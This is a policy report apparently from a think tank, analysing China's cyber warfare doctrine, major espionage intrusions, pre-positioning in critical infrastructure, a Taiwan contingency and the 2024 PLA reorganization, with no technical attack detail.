Cyber War Playbook 3

Overview of China’s Cyber Playbook

“Efforts should be made to build our country into a network powerhouse.”

— Chinese President Xi Jinping, 2014 Central Network Security and Informatization Leading Small Group meeting

Chinese President Xi Jinping’s remarks at the 2014 Central Network Security and Informatization Leading Small Group meeting marked a new phase in the Chinese government’s approach to cyberspace. Beijing is making a determined effort to fully integrate cyber operations with its other military capabilities, with an end goal of excelling at a comprehensive, agile form of modern conflict. China views conditions of peace and war not as a dichotomy, with different rules governing each, but as a spectrum. What the United States and its allies refer to as strategic competition, China sees as akin to low-level warfare. That low-level war explicitly includes information operations, including computer network operations. China’s cyber tool kit is an extensive part of the arsenal, providing opportunities for a range of actions. Further, China’s view of what qualifies as appropriate targets means it is willing to use cyber tools against a variety of targets, including some which Western countries would see as out-of-bounds.

China’s offensive cyber operations are part of a larger, integrated concept of information warfare. That concept is embedded in its military, diplomatic, and economic strategy. In 1995, Major General Wang Pufeng, who is considered to be the father of Chinese information warfare, wrote, “Information war is a crucial stage of high-tech war. . . . At its heart are information technologies, fusing intelligence war, strategic war, electronic war, guided missile war, a war of ‘motorization’ (jidong zhan), a war of firepower (huoli)—a total war. It is a new type of warfare.” Chinese military scholars wrote in the 2017 Guofang Keji, a Chinese defense journal, about the integration of these efforts:

The physical level requires the realization of the vertical and horizontal connection and integration of various combat units and combat elements, unified command, unified control and unified coordination. The information level requires the controllability, sharing, and robustness of command information. The above-mentioned command and control capabilities play a decisive role in the control of cyberspace and the success or failure of operations, so they have become one of the core capabilities of cyberspace combat power construction.

People’s Liberation Army (PLA) planners envision cyber as a key part of a comprehensive, integrated strategy for the entire spectrum of modern warfare, from espionage to competition to conflict. Beijing seeks to collect intelligence; prepare the environment for cyberattacks; imperil a potential adversary’s command, control, and communications systems; disrupt commerce and critical infrastructure; and influence populations.

Like Moscow, Beijing views offensive cyber capability and information warfare as inextricably linked. Beijing’s 2015 Military Strategy extensively discusses the “informatisation of warfare” and says China will build an “informationised military” to win “future informationised wars.” China’s understanding of information operations combines military capabilities with cyber warfare, electromagnetic warfare, counterspace, propaganda, and denial and deception, which reflects a bent toward gaining an “information advantage” over its adversaries. Beijing views achieving this “information superiority” as an essential prerequisite for kinetic warfare, which is rooted in the belief of the Chinese Communist Party (CCP) that losing a major military operation could jeopardize the regime’s domestic legitimacy. Consequently, the CCP prioritizes securing “information superiority” before deploying military force to ensure conditions are fully prepared and success is “virtually guaranteed.” Beijing also sees data as a strategic asset and sees no boundary between industry intellectual property (IP) and state secrets: Both are fair game for espionage. Using tactics honed for internal surveillance, it has mined the rest of the world for useful data.

Beijing notably does not employ the term “cybersecurity” but rather uses “network security” (wangluo anquan), which includes the “use of information . . . to influence or control . . . an opponent’s decision-making activities” and can serve both “offensive and defensive” purposes. As a result, China’s concept of network security extends beyond the West’s narrower focus on protecting cyberspace from cyberattacks and encompasses broader national security concerns across economic, political, and social dimensions. This perspective continues to shape and inform much of China’s cyber strategy and playbook.

Chinese activity in the cyber domain is also characterized by exceedingly broad collection, typically for espionage and information gathering. According to CrowdStrike Intelligence, China-affiliated actors were the most active intrusion groups in 2022, targeting “nearly all 39 global industry sectors and 20 geographic regions.” While the primary focus was on organizations in the government and technology sectors across Asia (66 percent), organizations in Europe and North America were also heavily targeted, accounting for approximately 25 percent of Chinese intrusion activity. Africa, South America, and Oceania made up the remaining 9 percent. China-affiliated intrusion groups also rank among the most capable in exfiltrating massive amounts of personal data. According to an August 2021 U.S. Senate Select Committee on Intelligence hearing, China has hacked and stolen the personal data of about 80 percent of Americans since 2014. Further, over the past five years, U.S. government officials have identified Chinese hacking groups covertly embedding themselves into U.S. critical infrastructure. These actions, which “have no legitimate espionage value,” according to the Cybersecurity and Infrastructure Security Agency (CISA), strongly indicate that the groups’ ultimate objective is sabotage.

Beijing has used information warfare to deter what it views as the United States and its allies’ interference in its affairs. This approach manifests itself as both denial and compellence. To deny, Beijing enacts policies like the Great Firewall, locking down incoming information, by way to prevent the United States from gaining a foothold. Meanwhile, it has sought to compel actors to align with China’s view or remain on the sidelines, largely through a combination of economic power and its vast army of cyber “trolls.” For instance, in October 2019, after Houston Rockets Manager Daryl Morey tweeted in support of the Hong Kong protests, China’s “troll mob” retaliated by posting 170,000 tweets criticizing Morey, while China’s state media temporarily suspended all National Basketball Association (NBA) broadcasts in the country. This resulted in hundreds of millions of dollars in lost NBA revenue and a rapid apology from Morey. Similarly, in 2021, Lithuania experienced a 91 percent drop in its exports to China after allowing Taiwan to open a representative office in Vilnius.

Despite rapidly developing its cyber capabilities over the past decade, China’s cyber ecosystem may still have underlying flaws. According to the International Institute for Strategic Studies (IISS), China’s intelligence analysis and dissemination capabilities remain “less mature” than those of the West. Furthermore, China’s intelligence analysis tends to be driven by ideology, often “enmeshed with questions of prestige around the political goals of the CCP leaders,” making it more vulnerable to political influence, intrigue, scandals, and corruption purges. For instance, the PLA’s Strategic Support Force (SSF), which housed China’s Cyber Department, was completely restructured after eight short years, likely due to corruption concerns among SSF leadership. Certain secretive PLA cyber groups have been detected—and exposed—by private U.S. companies, leading to fierce denials from Beijing. For instance, on February 19, 2013, cybersecurity firm Mandiant uncovered and exposed the highly secretive PLA cyber espionage group Comment Panda (also known as PLA Unit 61398) by reportedly exploiting significant vulnerabilities in the group’s network.

Core Elements of China’s Strategy

“Without cybersecurity, there is no national security; without informatization, there is no modernization. Cybersecurity and informatization are two wings of one body and two wheels of one drive.”

— China’s 2016 National Cyber Strategy

While Beijing has released little in the way of an official explanation of its cyber playbook, a combination of scholarly writings by individuals associated with the military and a careful analysis of China’s uncovered cyber operations provide a rough map of Chinese theory and practice in this domain. Still, any observer of Chinese activity must keep in mind that theory can look good on paper while implementation falls short. Although this is true everywhere, it is particularly pronounced in authoritarian societies, where good news is reported and bad news is silenced. This section of the report describes what China has officially said about its approach to cyber, and the next section examines how China applies these concepts in practice.

“World-Class” Cyber as a Core Mission

Beijing first acknowledged the critical role of the cyber domain in conflict in a 2013 Academy of Military Science’s publication, The Science of Military Strategy. In the ensuing 12 years, the PLA has built out its offensive and defensive cyber capabilities, including as part of a massive reorganization of its military forces. Its original goal was to create a strategically valuable cyber capability by 2020, but as of 2019, China described its cyber capabilities as “commensurate with its status as a major cyber country developing into a cyber power.”

Similarly, China’s 2015 Military Strategy called computer network operations a “new pillar of economic and social development” and a “new domain of national security.” It further laid out a clear goal to “expedite the development of a cyber force, and enhance its capabilities of cyberspace situation awareness, cyber defense, [and] support for the country’s endeavors in cyberspace.” China also aims to become a world-leading cyber power by 2035. To achieve this goal, it intends to heavily focus on the “informatization” of warfare, and strengthen its cyber situational awareness and defense capabilities in order to “stem major cyber crises, ensure national network and information security, and maintain national security and social stability,” according to its 2015 Military Strategy.

Further, according to a 2020 U.S. Department of Defense (DOD) report, China is also increasingly prioritizing an “intelligentized” approach to warfare, which focuses on developing emerging technologies such as artificial intelligence (AI), cloud and quantum computing, and unmanned systems to target and degrade adversaries’ systems. In short, China believes its cyber goals are intertwined with “social stability” and that only by building an “informatized” and “intelligentized” military will it be able to meet its cyber objectives and “win future ‘informatized’ wars.”

Highly Motivated for Success

Part of the motivation for China’s efforts in the cyber domain is a desire to maintain stability and control over its domestic population. The 2017 National Cyber Strategy says that:

Political stability is the basic prerequisite for national development and people’s happiness. The use of the network to interfere in [China’s] internal affairs, attack [its] political system, incite social unrest, and [conduct] large-scale network monitoring, network theft and other activities seriously endanger the national political security and user information security.

According to the IISS, China’s primary strategic objective in cyberspace has been to control domestic thought, specifically by preventing the online spread of Western ideas. Drawing from the 2003 UN concept of “cyber sovereignty,” which calls on states to exert control over their own portion of the internet, China developed its “Golden Shield Project”—an internal surveillance and censorship system that evolved into what is now known as the “Great Firewall of China.” Further, witnessing the growing role of social media in sparking social unrest—notably the 2009 Iran protests, 2010 Arab Spring, and 2011 England riots—caused the CCP to intensify its monitoring of domestic internet activity. Today, Chinese surveillance efforts remain focused on domestic control, with its Ministry of Public Security (MPS) operating what is considered to be the largest surveillance system in the world.

This view of domestic technological innovation as a national security priority may help explain certain state-sponsored cyberattacks on foreign technology companies aimed at stealing IP. For example, in 2016, the China-affiliated threat group Stone Panda stole “hundreds of gigabytes” of sensitive data from companies in aviation, space, communications, advanced manufacturing, maritime technology, and oil and gas—all core sectors outlined in the CCP’s Made in China 2025 plan to boost the country’s technology industry and reduce its reliance on U.S. companies. On paper, China has set the ambitious goal of ensuring that 70 percent of its core internet technology is domestically produced by 2025.

Further, China’s cyber legislation and regulations are intentionally designed to enhance and refine the country’s cyber capabilities. For example, the 2021 Regulations on the Management of Network Product Security Vulnerabilities, drafted by the Cyberspace Administration of China (CAC), the MPS, and the Ministry of Industry and Information Technology (MIIT), “require companies doing business in China to report software vulnerabilities in their products or products they use to the MIIT within forty-eight hours of discovery,” according to an Atlantic Council report. This regulation, coupled with state-sponsored student hacking competitions (such as the TOPSEC Cup), provides China’s security services with a “steady stream of vulnerabilities to exploit for state-sponsored operations,” according to a 2022 report by the U.S.-China Economic and Security Review Commission (USCC).

China’s concept of network security encompasses political dimensions, which may explain why the CCP views commercial communication networks and information technology (IT) standards as tools to strengthen its influence and project power abroad. Consequently, China sees competition with the West over IT architectures as a zero-sum game.

How Cyber Strategy Fits into Foreign Policy

China, like Russia and the United States, portrays its efforts as entirely defensive. The 2013 Defense White Paper and 2015 Military Strategy note that China would not attack unless attacked first, but “we will surely counterattack if attacked.” This strategy, known as “Active Defense,” aims “to enhance defense capabilities in order to survive and counter after suffering an offensive cyber strike.” As a retired PLA colonel, citing an active-duty PLA colonel, put it in 2019: “After the first round of a cyberattack, the targeted side can respond with a precise counterattack as long as it has a strong defense. The attacker will then suffer unfavorable outcomes if its defense is not good enough. From this perspective, it is wiser to make efforts in building up a strong defense.” Furthermore, China’s National Cyber Strategy asserts that China is prepared to “take all measures, including economic, administrative, scientific and technological, legal, diplomatic, [and] military” to “protect . . . [its] information facilities” and “safeguard [its] cyberspace sovereignty.”

China sees cyber as a lawless space with weak international norms. Sovereignty is a particularly fluid concept: While Beijing insists on absolute authority within its own borders, it also aggressively operates within the physical and cyber borders of other nations. A government official from a U.S. ally summed up this approach as “there is an area of me you can’t attack and areas of you that I can.” Put differently, Beijing views China’s internal internet as its own sovereign territory and other countries’ internet as its hunting grounds. Just as China sees heavy censorship as completely acceptable, it also sees civilian suffering at a low level as justified to accomplish larger goals. Media manipulation, power disruption, point-of-sale manipulation, and disruption of communications are all legitimate actions to accomplish the state’s goal. Further, attacks on civilian infrastructure, like power grids, are also a part of the plan to deter or coerce the United States and its allies.

Ke Hongfa, Zhu Jilu, and Zhao Rong in Guofang Keji describe two types of attacks: “information utilization” also known as “soft kill” attacks like influence campaigns; and “high-precision physical destruction of hardware,” such as IT infrastructure. These two forms of attack have the benefit of “remote control, flexible maneuverability, strong destructive power, and small collateral damage.” This simple taxonomy of attacks sheds light on what China values in cyber warfare—the ability to destroy hardware or manipulate information from afar, with little risk.

At the time of writing, Beijing has largely focused its cyber efforts on the first type of attack: espionage and information utilization. These efforts can also be split into two main lines: (1) theft of data, and (2) research on the setup of a network for potential exploitation later. In the first instance, stealing research and development (R&D), state secrets, or personal data can advance Chinese political or economic interests. In the second, operational preparation of the environment (OPE), or establishing the knowledge of networks and footholds, is necessary to execute later operations, including destructive ones. Writing in Guofang Keji, Ke, Zhu, and Zhao describe these reconnaissance operations:

Cyberspace reconnaissance operations are mission behaviors to obtain information about opponents or potential opponents’ cyberspace operations and network resources. The network information of reconnaissance is the prerequisite basis for all cyber combat operations and can also be used to verify current intelligence or predictions.

“Information Utilization” or “Soft Kill” Attacks

While China views information operations—such as propaganda and cyber operations—as existing along a spectrum of information warfare, this project draws a clear, bright line between the two and focuses nearly exclusively on the latter: computer network operations designed to move or change data, not minds. While modern information operations use computers as a delivery mechanism for their substantive payload, the 1s and 0s are incidental to the operation; in contrast, in cyber operations the 1s and 0s themselves are the payload. Changing minds can be among the most powerful of weapons, but the methods and future in that space are different from those of cyber warfare. This report is scoped solely to examine operations intended to produce an outcome in the physical world.

Still, these arenas occasionally overlap. Australian officials have highlighted Chinese efforts to undermine computer security training with Pacific Island nations by engaging in a smear campaign against U.S. and Australian capabilities. For example, Beijing’s diplomats will say that the United States has no proof that China engages in offensive cyber activity, then make the counteraccusation that Google, Microsoft, and others are really tools of the U.S. government and that those companies are the ones planting dangerous back doors. Hacks and leaks can also be a combination of the two tool sets—computer network operations to obtain the data, then a leak strategy designed to maximize the effect on minds.

According to the Office of the Director of National Intelligence (ODNI), China is also increasingly using information operations to undermine U.S. global leadership and democracy and expand Beijing’s influence. These efforts primarily focus on promoting pro-China narratives and countering foreign policies that threaten “China’s international image, access to markets, and technological expertise.” This is especially evident when China views the issues as matters of internal sovereignty, such as those involving Hong Kong, Taiwan, Tibet, and Xinjiang. China is continually refining its influence operations, even experimenting with generative AI to run fake TikTok accounts. These accounts, made by the CCP-affiliated threat actor “Spamouflage,” spread divisive content on social media to sow division among U.S. voters. According to ODNI, China’s recent efforts to exploit perceived societal divisions in the United States increasingly resemble Moscow’s approach to influence operations.

SOFT KILL: DATA THEFT

Unlike Moscow, China stands out in its approach to collecting vast quantities of data. One reason for Beijing’s focus on data theft is almost certainly in part to train its artificial intelligence/machine learning (AI/ML) systems. A 2021 DOD report highlighted this approach, stating that the PLA explicitly called out big data as “useful for monitoring and early warning.” Further, AI is “a tool for more realistic exercises and the ability to respond quickly in the case of a conflict in cyberspace.”

China also engages in extensive industrial cyber espionage, exfiltrating vast amounts of private sector information, trade secrets, R&D data, and products. According to the U.S. Department of Justice (DOJ), “more than 90 percent of [its] cases alleging economic espionage . . . involv[ed] China.” In an October 2014 interview, then-Federal Bureau of Investigation (FBI) Director James Comey estimated that Chinese cybercrime costs the U.S. economy “billions” of dollars every year. The USCC estimates the figure to be closer to “tens of billions of dollars” every year.

China’s intelligence collection against the United States has been comprehensive:

• In early 2014, Chinese actors hacked the health insurance company Anthem, exfiltrating an estimated 78 million member names, birth dates, and phone and Social Security numbers.

• Beijing hacked the Office of Personnel Management (OPM) in 2014 and stole 21.5 million records, including background check data and employee fingerprints.

• In 2017, Beijing hacked credit reporting agency Equifax and stole the credit data of 147.9 million Americans.

• Between 2014 and 2018, Beijing hacked Starwood Hotels’ reservation system and stole credit card and passport information from approximately 500 million people.

With this combination of data, China could identify U.S. government employees with security clearances who had financial or health problems, trace where they are about to travel, and create opportunities for Chinese intelligence agents to make an approach (a “bump”). In addition to this kind of tactical use, data at scale is a strategic asset—whether to train AI/ML models or to develop knowledge that could inform an influence campaign.

HARD KILL: “HIGH-PRECISION PHYSICAL DESTRUCTION OF HARDWARE”

The second type of attack Ke, Zhu, and Zhao describe in Guofang Keji is “hard kill,” or high-precision destruction. Russia and Iran have both executed this type of cyberattack in recent years—for example, Russia took Ukraine’s power grid offline in 2015 and again in 2022, while Iran destroyed thousands of computers belonging to Aramco, the Saudi state-owned oil company, in 2012. China has not yet executed such an attack, but it has pre-positioned assets to do so when deemed necessary.

The theory behind this kind of attack is to create disruption, confusion, and disarray during a crisis. The aggressor simply needs to identify pain points in the target’s logistical operations and make everything just a little bit harder, slowing or temporarily halting effective functioning. If the target country cannot move people, fuel, and materiel, it cannot effectively fight. For example, if China were able to disrupt transport around military bases—such as train signals, port equipment, or electricity—it could likely slow deployment of U.S. forces for hours, if not days. In the case of a Taiwan contingency, a 24-hour deployment delay might be enough to allow the PLA to gain a foothold on the island before the United States could effectively assist. One member of an allied military noted that it might be as simple as changing the barcodes on shipping containers in a military warehouse or shuffling the data in an Excel spreadsheet managing deployments. If mufflers, rather than munitions, are loaded onto the ship, that vessel’s effectiveness is greatly diminished. Another allied official said a military must be able to “move, feed, and power” soldiers—illustrating the targets of Chinese operations.

Beijing could also cause disruption by targeting critical infrastructure, which governments define as items necessary for the functioning of daily life. Critical infrastructure, however, is generally considered off-limits to military activity. Targeting civilian critical infrastructure is illegal under the Law of Armed Conflict because of the potential for mass casualties and the high likelihood of civilian suffering if, for example, a water treatment plant were taken offline for days. However, what constitutes critical infrastructure is often in the eye of the victim, and China has demonstrated a willingness to penetrate water, power, and fuel systems within the United States. Australia, too, saw an uptick in attacks on critical infrastructure systems from 2022 to 2023. New requirements in Australia make reporting breaches of critical infrastructure systems mandatory, which will lead to better data on the trend lines of the problem and more comprehensive awareness of the problem’s scope.

Beijing’s efforts against critical infrastructure are not new. In July 2021, the U.S. Department of Homeland Security issued a threat alert on Chinese penetrations of natural gas pipelines, citing efforts dating back to 2011. The alert disclosed that suspected Chinese hackers had gained access to the controls of several U.S. natural gas pipeline companies. Ominously, it also stated that these penetration strategies “remain relevant” today. At the time, a Mandiant researcher asserted that the goal of the attack was likely economic espionage: “We have seen little evidence over the past 10 years of [Chinese] cyber operations targeting critical infrastructure with the end goal of disruption or destruction, but we do not discount the possibility that they may do so in future conflict scenarios, such as in the event of war.”

The Mandiant researcher was wrong, but the latter half of the comment was prescient: Since 2011, China-affiliated actors—most notably Volt Typhoon—have embedded themselves in the networks of “aviation, rail, mass transit, highway, maritime, pipeline, water, and sewage organizations” in the mainland United States. Indeed, the researcher went on to say that Mandiant had recorded “multiple threat actors linked to China” targeting industrial control system (ICS) operators and natural gas pipeline companies, an energy company, and an ICS equipment manufacturer and security firm. While this activity may have yielded some economic benefit, it now appears far more likely that the Chinese attackers were conducting reconnaissance for future operations, such as OPE.

In Australia, cyberattacks may be redundant. Canberra has discovered that China may have established a more direct route: A large percentage of critical infrastructure is already Chinese-owned. For instance, Hong Kong–based CKI controls 51 percent of the South Australia Power Network and a majority share of gas transmission and distribution pipelines—68 percent in Victoria, 86 percent in South Australia, and 72 percent in Queensland. A New South Wales group recently intervened to prevent a Chinese company from buying additional power generation and distribution capacity. Australia is hardly alone; China has also sought contracts to build critical infrastructure—including power and transportation systems—around newly constructed national capitals in Egypt and Indonesia.

The 2024 Annual Threat Assessment from the U.S. Intelligence Community (IC) and the Australian Signals Directorate (ASD) both note an increase in Chinese operations targeting critical infrastructure. The IC reports that U.S. private sector entities have found that Chinese cyber operations probably intend to “pre-position cyber attacks against infrastructure in Guam and to enable disrupting communications between the United States and Asia,” as well as “deter U.S. military action by impeding U.S. decisionmaking, inducing societal panic, and interfering with the deployment of U.S. forces” in the event of a conflict. Similarly, ASD reports that cyber incidents at the second-highest level (Category 2) “rose from 2 in Fiscal Year (FY) 2021–22 to 5 in FY 2022–23.” (Canberra’s report does not name either the perpetrator or the target specifically, but government officials in interviews indicated China’s responsibility for at least some attacks.)

How China Approaches Deniability

China’s activities in cyberspace include opportunistic campaigns conducted by patriotic hackers and hacktivists, which create highly visible effects while offering Beijing plausible deniability, as well as operations affiliated with the PLA and Ministry of State Security (MSS), which are intended to remain clandestine while enabling long-dwell espionage or pre-positioning for future attacks. Some actors cross these categories, with certain proxies maintaining loose or close affiliations with the Chinese government.

The first category comprises high-profile hacktivist campaigns aimed primarily at responding to perceived slights against China. For example, in 1999, “patriotic hackers” defaced U.S. government websites in retaliation for the accidental U.S. bombing of the Chinese embassy in Belgrade, Serbia. This category also includes high-profile cyberattacks on Taiwan, often in response to a specific event. For instance, just before then-U.S. Speaker of the House Nancy Pelosi’s visit to Taiwan in August 2022, Chinese hacktivists launched multiple distributed denial-of-service (DDoS) attacks against Taiwanese government websites.

China also leverages its vast and opaque network of PLA- and MSS-affiliated threat groups to carry out more sophisticated cyberattacks while maintaining a level of plausible deniability. These operations are often carried out by “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff” that operate out of PLA- or MSS-affiliated front companies and receive varying levels of government support. Furthermore, the central MSS body in Beijing delegates considerable authority to its provincial branches and exercises varying degrees of control over these groups, making it difficult for policymakers to determine the central government’s true degree of involvement and calculate an appropriate response. According to Alex Joske, a consultant at McGrathNicol, this partially explains why “no cyber-attacks have been publicly attributed to the central MSS” in Beijing, whereas many have been linked to advanced persistent threats (APTs) affiliated with MSS regional bodies at the provincial or municipal level.

Beijing has also engaged in sophisticated, long-term clandestine campaigns. These operations typically focus on espionage—either establishing a sustained, covert presence to gather intelligence or creating an infiltration that could be weaponized later. For example, the threat actor Volt Typhoon operated undetected for at least five years within the systems of U.S. aviation, rail, and water organizations, according to the FBI, National Security Agency, and CISA.

Implementation: Campaigns or Opportunism

China’s path from opportunism to campaigns to thoroughly integrating cyber domain operations into its warfighting strategy has been reasonably linear. Its early cyber operations were attributed to a loose collection of private “patriotic hackers.” Over the next 15 years, the number of actors and the spread of activity expanded dramatically until the 2015 reorganization and consolidation of cyber operations, which coincided with the broader PLA restructuring. This unified approach has resulted in more targeted cyber activity, with campaign targets aligning largely with China’s five-year plans.

Cyber campaigns are inherently challenging due to the difficulties of timing and coordination. As a result, cyberattack operations often combine deliberate targeting with opportunism (which involves identifying exploitable vulnerabilities). For example, the China-affiliated threat group Wicked Panda identified and quickly exploited zero-day vulnerabilities in the USAHerds application (CVE-2021-44207) and Log4j (CVE-2021-44228) framework. This quiet but effective operation ran from May 2021 to February 2022, successfully compromising at least six unidentified U.S. state government networks.

China’s Vulnerabilities

Creating pre-positioned tools to deploy at a moment’s notice in case of a contingency looks good on paper, but translating a script into reality on the battlefield is far harder. As the adage goes, no battle plan survives first contact with the enemy. China has not fought a shooting war since 1979, and many of its cyber operations remain more theoretical than practical. While they can still be highly disruptive, orchestrating the right sequence of dominoes to fall at the precise moments to fit perfectly with a larger battle plan remains difficult. As an allied interviewee put it, “China thinks it can leverage a large number of effects simultaneously around the globe. They like to follow a script, and they don’t think about the flexibility in planning that is so critical for cyberattacks.”

One way to manage a highly scripted operation is through extensive testing. A cyber range can be useful, but like any controlled environment, it is inherently artificial. Testing on a live target is the most effective way to gauge the impact of a cyberattack, but this approach is brazen and generally only used by Russia and North Korea. Moreover, it risks alerting the target, prompting patching and improved defenses that render the tool obsolete. For example, Beijing might consider testing tools on the Philippines before deploying them against the United States, but Philippine systems are likely to be quite different, to the point of not being a useful comparison. On the other hand, testing tools in environments where detection is less likely could be advantageous.

China heavily relies on foreign vendors for core network technologies, including essential U.S. software and hardware. For instance, it often refers to the “eight King Kongs” (bada jingang) when discussing the largest internet companies in its domestic supply chain: Apple, Cisco, Google, IBM, Intel, Microsoft, Oracle, and Qualcomm. China has long regarded its reliance on this small number of companies to be a national security risk. This concern is amplified by China’s state-run media, which often portrays these U.S. companies as proxies for the U.S. government. Many Chinese experts also hold the mistaken belief that, as in China, the U.S. government wields significant influence over U.S. companies, and that “the United States [government] can disrupt or corrupt the functioning of any device with U.S.-made software.”

Cyber War on Taiwan?

Pairing cyber operations with a potential amphibious assault on Taiwan would be extremely high risk but also high reward. According to the Australian Cyber Security Centre (ACSC), in a Taiwan contingency, China would need to cross Taiwanese airspace uncontested. One way to achieve this would be to use cyber tools to disable operations at Taiwan’s airfields and air defenses, allowing China to land on intact airfields. This could help China establish air superiority, funnel supplies, and deploy small contingents of ground troops in preparation for a larger amphibious assault. However, if these cyber operations fail to sufficiently degrade Taiwan’s air defenses, China risks significant losses in aircraft, personnel, and equipment—along with a serious blow to morale and prestige.

In parallel, China could launch cyberattacks on U.S. systems as part of its invasion strategy. It is already embedding itself in U.S. critical infrastructure, and if Beijing manages to compromise and sabotage key systems supporting U.S. military bases—such as power grids or water treatment facilities in the Philippines, Guam, or Hawaii—it could time these disruptions with its blockade of Taiwan. Even a 24-hour delay in the U.S. response could tip the balance in China’s favor and secure its control over the island. However, if these cyber operations fail or prove insufficient, and the United States is able to send enough aid to Taiwan in time, the situation could quickly escalate into a direct military conflict between the world’s two most powerful countries.

Organizational Capabilities

Who Are the Fighters?

China’s efforts in the cyber realm began much like those of other nations, with volunteer or patriotic hackers experimenting in a private capacity. As the Chinese government recognized the potential of this domain, it gradually developed an in-house cadre of hackers. In recent years, China has pursued a strategy of military-civil fusion, including in the cyber domain, which a 2021 DOD study found attempts to “increase the proportion of private companies that contribute to military projects and procurements.” These enterprises include “technology companies that specialize in unmanned systems, robotics, artificial intelligence, cybersecurity, and big data.” The resulting Chinese ecosystem of cyber actors is diverse and capitalizes on the strengths of military, civilian, and ostensibly nongovernmental organizations.

Inside the government, Beijing has gone through multiple iterations of organizing itself for cyber activity, much like every other sophisticated actor. However, Beijing has made large, sweeping changes several times, likely with the aim of creating smoother integration between cyber activity and other military and intelligence operations. China completely revamped its cyber structure between 2015 and 2018. Prior to 2015, the PLA, Technical Reconnaissance Bureaus, and MSS all conducted cyber operations. A military reorganization in 2015 was intended to bring peripheral activity under far tighter state control, while a 2018 civilian reorganization did the same. Another reorganization in 2024, meanwhile, was likely part of an anti-corruption push by President Xi. This section of the report reviews the current organization of China’s cyber forces, including the 2024 reorganization, as well as previous iterations.

Military

THE PLA’S STRATEGIC SUPPORT FORCE (SSF): MADE AND UNMADE

In 2015, apparently seeking to bring more discipline and order to Chinese efforts, Xi ordered a restructuring of China’s cyber and information warfare capabilities. With the new structure, the SSF centralized military elements of warfare in the cyber domain, including electronic, information, and psychological warfare. The new group became a full service alongside the PLA Army, Navy, Air Force, Rocket Force, and Joint Logistics Support Force. Several departments were placed under the new SSF, including the Aerospace Systems Department, the Electronic and Electromagnetic Systems Department, and, central to this discussion, the Network Systems Department. At the time, the SSF appeared to be firmly in charge of coordinated Chinese efforts in the cyber domain. But less than a decade later, the PLA effectively disbanded the SSF. The reasons for this shift are unclear from the outside, but theories include an anti-corruption push, a recognition that the leaders of this new organization had too much power, or a reorganization aimed at further streamlining support functions.

The 2024 disbanding had several impactful features. First, the large SSF that was intended to streamline military functions is now a collection of independent “arms.” Second, the heads of each arm were downgraded in rank and are no longer equivalent to the heads of the other theater-grade services. Despite this demotion, they still report to the Central Military Commission (CMC), whereas previously only the head of the SSF answered directly to the CMC. Third, the information support role of the former SSF may have gained prominence. Finally, the disaggregation could be designed to more closely mirror the U.S. system, which might be seen as either a compliment or an attempt to more effectively measure Beijing’s capability versus U.S. Cyber Command (USCYBERCOM). The actual roles and responsibilities of the forces appear largely unchanged.

For those who enjoy the lines and boxes of bureaucracy, the detailed breakdown of the SSF restructuring follows: On April 19, 2024, the PLA officially disbanded the SSF and created three new arms. The heads of these arms were declared “deputy theater-level branches,” led by generals of slightly lower rank than the previous heads and lower ranks than the heads of the full services, like the PLA Army and Navy.

The three new arms are the PLA Military Aerospace Force (ASF) (created from the SSF’s Aerospace Systems Department), the PLA Information Support Force (ISF) (created from the SSF’s Electronic and Electromagnetic Systems Department), and the PLA Cyberspace Force (CSF) (created from the SSF’s Network Systems Department). A fourth is the PLA Joint Logistic Support Force (JLSF), which was a preexisting body reclassified an arm and primarily oversees logistical operations. Engaging in a bit of Kremlinology-type speculation, researcher Meia Nouwens suggested in an analysis for the IISS that the order in which the arms were announced in the Ministry of National Defense’s press release might be significant. Specifically, the ASF and CSF might rank as more senior than the ISF. This alignment completes the “three services and four arms” model. While the distinction between a service and an arm is unclear, arms appear to be largely independent of the four services.

▲ Figure 1: PLA Structure Post-2024 Reorganization. Source: J. Michael Dahm, “A Disturbance in the Force: The Reorganization of People’s Liberation Army Command and Elimination of China’s Strategic Support Force,” Jamestown Foundation, China Brief, vol. 24, no. 9, April 26, 2024.

Initial analyses indicate that the roles and responsibilities of the arms will remain the same. The CSF will likely continue to conduct “defensive and offensive information operations,” including “reinforcing national cyber border defense, . . . detecting and countering network intrusions and maintaining national cyber sovereignty and information security.” Further, according to a Usanas Foundation paper by Tenzin Younten, the CSF will also conduct “electronic warfare, psychological warfare, and technical reconnaissance” operations. The ISF will likely be responsible for “build[ing] a network information system that fulfils the [PLA’s] requirements of modern warfare” and will oversee “informational warfare.” The reasons for this rapid reorganization are far more interesting and tell a potential story of corruption and weakness. They broadly fall into the categories of operational efficiency, a rise in prominence of these functions, or corruption crackdowns. The last of the three is the most likely explanation, but the following paragraphs will address each theory in turn.

Operational efficiency could conceivably be the main reason for the reorganization, but the evidence is thin. In an article for The Diplomat, Ying Yu Lin and Tzu-Hao Liao write that the SSF’s mandate encompassed a wide range of fields, including information and communications technology, aerospace, cyber operations, and electronic warfare. This range, combined with the SSF’s decentralization, caused the service to “spread [itself ] thin, with individual units vying for resources.” Further, the model of incorporating everything into the SSF also led to redundancies and “overlapping organizational structures [that] impeded operational efficiency.” For instance, the SSF’s Aerospace Department “managed backend systems for space-related [systems and] equipment development.” However, these were also overseen by the SSF’s Equipment Development Department and certain bodies within the PLA Rocket Force and Air Force. This may all be true, but it is hard to see how demotions and reorganization solve any of these problems. Subordinate operational efficiency may have been a notable side effect of the re-reorganization.

Another option is that this restructuring occurred to further separate and prioritize the cyber, space, and information domains within the PLA. For instance, while the ASF and CSF likely retained much of their structures from their SSF predecessors, the entirely new ISF was created primarily to support general PLA activities. Therefore, Nouwens argues that in creating the ISF, Xi “likely thinks that the ‘information support’ function requires greater prominence,” particularly at the “inter-service and inter-theatre levels.” In his Usanas Foundation paper, Younten partially supports this assessment by noting that the restructuring transformed the SSF “from a subordinate organization to a fully-fledged independent armed forces with enhanced capabilities, operational status, and resources.” This shift may indicate a growing prioritization of these domains within the armed forces. Lin and Liao partially concur: The 2024 “restructuring aims to enhance the PLA’s capabilities in an era increasingly defined by information warfare and cyber operations.” At best, however, there is a mixed message regarding prominence. Demoted leadership suggests less priority is placed on these missions, but direct reporting to the CMC might suggest a higher priority, at least for centralizing these functions.

The third explanation is far more likely: a corruption purge. Two commanders disappeared after the reorganization and have not resurfaced. The former SSF commander, General Ju Qiansheng, and the former SSF deputy commander, Lieutenant General Shang Hong, have not been reshuffled into the PLA structure and have “largely disappeared from public view,” according to Nouwens. This could also explain why Xi sought to ensure the new leaders of these arms were of lower rank than the full theater-grade generals of the services, while still maintaining direct oversight over them through the CMC, which he chairs. However, this remains impossible to confirm and is entirely speculative.

▲ Figure 2: Chinese Cyber Actors. Source: CSIS research.

